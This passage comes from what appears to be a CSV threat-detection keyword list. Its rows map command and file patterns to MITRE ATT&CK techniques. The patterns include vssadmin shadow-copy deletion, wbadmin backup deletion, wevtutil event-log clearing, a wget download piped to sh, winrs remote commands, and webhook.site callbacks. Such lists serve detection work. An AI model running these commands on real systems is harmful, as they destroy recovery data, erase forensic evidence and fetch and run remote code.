recovery data to prevent system recovery after an attack","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*vssadmin list shadows*",".{0,1000}vssadmin\slist\sshadows.{0,1000}","greyware_tool_keyword","vssadmin","List shadow copies using vssadmin","T1059.003 - T1059.001 - T1005","TA0002 - TA0005 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*vssadmin* Delete Shadows /All /Quiet*",".{0,1000}vssadmin.{0,1000}\sDelete\sShadows\s\/All\s\/Quiet.{0,1000}","greyware_tool_keyword","vssadmin","Deletes all Volume Shadow Copies from the system quietly (without prompts).","T1490","TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*vssadmin.exe Create Shadow /for=*",".{0,1000}vssadmin\.exe\screate\sshadow\s\/for\=.{0,1000}","greyware_tool_keyword","vssadmin","the command is used to create a new Volume Shadow Copy for a specific volume which can be utilized by an attacker to collect data from the local system","T1005","TA0009","N/A","N/A","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*bhnhkdgoefpmekcgnccpnhjfdgicfebm*",".{0,1000}bhnhkdgoefpmekcgnccpnhjfdgicfebm.{0,1000}","greyware_tool_keyword","Wachee VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*wbadmin delete backup*",".{0,1000}wbadmin\sdelete\sbackup.{0,1000}","greyware_tool_keyword","wbadmin","hinder recovery efforts with wbadmin","T1485 - T1490","TA0040 - TA0005","N/A","N/A","Defense 
Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wbadmin delete catalog -quiet*",".{0,1000}wbadmin\sdelete\scatalog\s\-quiet.{0,1000}","greyware_tool_keyword","wbadmin","delete the Windows backup utility catalog","T1565.001 - T1070 - T1490","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest*",".{0,1000}wbadmin\sDELETE\sSYSTEMSTATEBACKUP\s\-deleteOldest.{0,1000}","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*wbadmin DELETE SYSTEMSTATEBACKUP*",".{0,1000}wbadmin\sDELETE\sSYSTEMSTATEBACKUP.{0,1000}","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. 
adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*/webhook.site.git*",".{0,1000}\/webhook\.site\.git.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z" "*@email.webhook.site*",".{0,1000}\@email\.webhook\.site.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z" "*https://webhook.site/*-*-*-*",".{0,1000}https\:\/\/webhook\.site\/.{0,1000}\-.{0,1000}\-.{0,1000}\-.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","Out of band interaction domains","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z" "*webhooksite/webhook.site*",".{0,1000}webhooksite\/webhook\.site.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - 
TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z" "*whcli forward --token=*-*-* --target=https://localhost*",".{0,1000}whcli\sforward\s\-\-token\=.{0,1000}\-.{0,1000}\-.{0,1000}\s\-\-target\=https\:\/\/localhost.{0,1000}","greyware_tool_keyword","webhook.site","test HTTP webhooks with this handy tool that displays requests instantly - abused by attacker for payload callback confirmation","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://github.com/webhooksite/webhook.site","1","1","N/A","N/A","10","10","5234","402","2024-07-31T11:21:16Z","2016-03-21T08:45:42Z" "*gbfgfbopcfokdpkdigfmoeaajfmpkbnh*",".{0,1000}gbfgfbopcfokdpkdigfmoeaajfmpkbnh.{0,1000}","greyware_tool_keyword","westwind","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*https://we.tl/t-*",".{0,1000}https\:\/\/we\.tl\/t\-.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://wetransfer.com/api/v4/transfers/*",".{0,1000}https\:\/\/wetransfer\.com\/api\/v4\/transfers\/.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing 
campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*https://wetransfer.com/downloads/*",".{0,1000}https\:\/\/wetransfer\.com\/downloads\/.{0,1000}","greyware_tool_keyword","wetransfer","WeTransfer is a popular file-sharing service often used by malicious actors for phishing campaigns due to its legitimate reputation and widespread use even within some enterprises to share files","T1608.001 - T1566 - T1002 - T1048 - T1204","TA0001 - TA0002 - TA0010","N/A","EXOTIC LILY","Phishing","https://twitter.com/mthcht/status/1658853848323182597","1","1","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*ehbhfpfdkmhcpaehaooegfdflljcnfec*",".{0,1000}ehbhfpfdkmhcpaehaooegfdflljcnfec.{0,1000}","greyware_tool_keyword","WeVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*cmd* wevtutil.exe cl *",".{0,1000}cmd.{0,1000}\swevtutil\.exe\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. 
This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*for /F ""tokens=*"" %%G in ('wevtutil.exe el') DO (call :do_clear ""%%G"")*",".{0,1000}for\s\/F\s\""tokens\=.{0,1000}\""\s\%\%G\sin\s\(\'wevtutil\.exe\sel\'\)\sDO\s\(call\s\:do_clear\s\""\%\%G\""\).{0,1000}","greyware_tool_keyword","wevtutil","loops through event logs using wevtutil.exe to prepare to clear them","T1070.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/Shwmae","1","0","N/A","N/A","10","2","105","6","2024-08-12T12:28:08Z","2024-03-21T15:05:03Z" "*wevtutil cl *",".{0,1000}wevtutil\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wevtutil clear-log*",".{0,1000}wevtutil\sclear\-log.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. 
This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wevtutil.exe cl *",".{0,1000}wevtutil\.exe\scl\s.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wevtutil.exe clear-log*",".{0,1000}wevtutil\.exe\sclear\-log.{0,1000}","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. 
This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wevtutil.exe sl * /e:false*",".{0,1000}wevtutil\.exe\ssl\s.{0,1000}\s\/e\:false.{0,1000}","greyware_tool_keyword","wevtutil","disable a specific eventlog","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*wget -O - -q http://*.jpg|sh*",".{0,1000}wget\s\-O\s\-\s\-q\shttp\:\/\/.{0,1000}\.jpg\|sh.{0,1000}","greyware_tool_keyword","wget","potential malicious command with wget (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A" "*wget -O - -q https://*.jpg|sh*",".{0,1000}wget\s\-O\s\-\s\-q\shttps\:\/\/.{0,1000}\.jpg\|sh.{0,1000}","greyware_tool_keyword","wget","potential malicious command with wget (|sh)","T1566","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://x.com/CraigHRowland/status/1782938242108837896","1","0","N/A","risk of false positive","9","10","N/A","N/A","N/A","N/A" "* where /r C:\Windows\WinSxS\ *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}\swhere\s\/r\sC\:\\Windows\\WinSxS\\\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","greyware_tool_keyword","where","threat actors searched for Active Directory related DLLs in directories","T1059 - T1083 - T1018","TA0002 - TA0009 - TA0040","N/A","N/A","Discovery","https://thedfirreport.com/2023/04/03/malicious-iso-file-leads-to-domain-wide-ransomware/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -exec bypass -nop -c 
whoami*",".{0,1000}\s\-exec\sbypass\s\-nop\s\-c\swhoami.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Discovery","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A" "*whoami /all*",".{0,1000}whoami\s\/all.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*whoami /domain*",".{0,1000}whoami\s\/domain.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*whoami /groups*",".{0,1000}whoami\s\/groups.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*whoami /priv*",".{0,1000}whoami\s\/priv.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1033 - T1087 - T1069 - T1078","TA0007","N/A","N/A","Discovery","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A" "*whoami*",".{0,1000}whoami.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. 
or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Discovery","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","1","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*whoami.exe* /groups*",".{0,1000}whoami\.exe.{0,1000}\s\/groups.{0,1000}","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt. whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for Lateral Movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0007","N/A","N/A","Collection","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","N/A","greyware tool - risks of False positive !","8","10","9509","2752","2024-08-28T03:10:37Z","2017-10-11T17:23:32Z" "*cgojmfochfikphincbhokimmmjenhhgk*",".{0,1000}cgojmfochfikphincbhokimmmjenhhgk.{0,1000}","greyware_tool_keyword","Whoer VPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*ggackgngljinccllcmbgnpgpllcjepgc*",".{0,1000}ggackgngljinccllcmbgnpgpllcjepgc.{0,1000}","greyware_tool_keyword","WindmillVPN","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data 
Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*hnmpcagpplmpfojmgmnngilcnanddlhb*",".{0,1000}hnmpcagpplmpfojmgmnngilcnanddlhb.{0,1000}","greyware_tool_keyword","Windscribe","External VPN usage within corporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A" "*winrs -r:*cmd /c *",".{0,1000}winrs\s\-r\:.{0,1000}cmd\s\/c\s.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*winrs -r:*powershell -*",".{0,1000}winrs\s\-r\:.{0,1000}powershell\s\-.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*winrs -r:*whoami*",".{0,1000}winrs\s\-r\:.{0,1000}whoami.{0,1000}","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A" "*\CurrentVersion\Uninstall\winscp3_is1*",".{0,1000}\\CurrentVersion\\Uninstall\\winscp3_is1.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connection with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*\Program Files\WinSCP*",".{0,1000}\\Program\sFiles\\WinSCP.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connection with winscp - legit 
tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*\SOFTWARE\Martin Prikryl\WinSCP 2\*",".{0,1000}\\SOFTWARE\\Martin\sPrikryl\\WinSCP\s2\\.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connection with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","#registry","N/A","8","10","N/A","N/A","N/A","N/A" "*Temp*_WinSCP--Portable.zip*",".{0,1000}Temp.{0,1000}_WinSCP\-\-Portable\.zip.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connection with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "*winscp.com /command ""open sftp://*",".{0,1000}winscp\.com\s\/command\s\""open\ssftp\:\/\/.{0,1000}","greyware_tool_keyword","WinSCP","SFTP connection with winscp - legit tool abused by threat actors to exfiltrate data","T1105","TA0010","N/A","N/A","Data Exfiltration","N/A","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A" "* wireproxy.service*",".{0,1000}\swireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/bin/wireproxy*",".{0,1000}\/bin\/wireproxy.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy.conf*",".{0,1000}\/wireproxy\.conf.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - 
T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy.git*",".{0,1000}\/wireproxy\.git.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy.service*",".{0,1000}\/wireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy/releases/*",".{0,1000}\/wireproxy\/releases\/.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy_darwin*",".{0,1000}\/wireproxy_darwin.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy_linux_*",".{0,1000}\/wireproxy_linux_.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*/wireproxy_windows*",".{0,1000}\/wireproxy_windows.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","1","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy-ci-test*",".{0,1000}\/wireproxy\-ci\-test.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy-master*",".{0,1000}\/wireproxy\-master.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*/wireproxy-udp*",".{0,1000}\/wireproxy\-udp.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireguard.go*",".{0,1000}\\wireguard\.go.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireproxy.service*",".{0,1000}\\wireproxy\.service.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireproxy\*",".{0,1000}\\wireproxy\\.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireproxy-ci-test*",".{0,1000}\\wireproxy\-ci\-test.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireproxy-master*",".{0,1000}\\wireproxy\-master.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*\wireproxy-udp*",".{0,1000}\\wireproxy\-udp.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","N/A","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*009878ba04d0708fd86cc333fcda1e4d9f6a908b95bf28484dcae293bd497201*",".{0,1000}009878ba04d0708fd86cc333fcda1e4d9f6a908b95bf28484dcae293bd497201.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 
"*01553e1a8ac9b5a158f2ff4861643892ac018aefe598c80fb09710c702b70d8c*",".{0,1000}01553e1a8ac9b5a158f2ff4861643892ac018aefe598c80fb09710c702b70d8c.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*01afaf85adb57c17d2d817c34134ffc1804db080b9493cc7e1a45e3288bf7536*",".{0,1000}01afaf85adb57c17d2d817c34134ffc1804db080b9493cc7e1a45e3288bf7536.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" "*02b26e392e2c9043de39d0c39595b587383170b211b2b86f3499227100192e41*",".{0,1000}02b26e392e2c9043de39d0c39595b587383170b211b2b86f3499227100192e41.{0,1000}","greyware_tool_keyword","wireproxy","Wireguard client that exposes itself as a socks5 proxy","T1572 - T1090 - T1071.004","TA0011 - TA0005","N/A","N/A","C2","https://github.com/pufferffish/wireproxy","1","0","#filehash","N/A","10","10","4304","246","2024-07-22T14:38:19Z","2022-03-11T12:32:10Z" 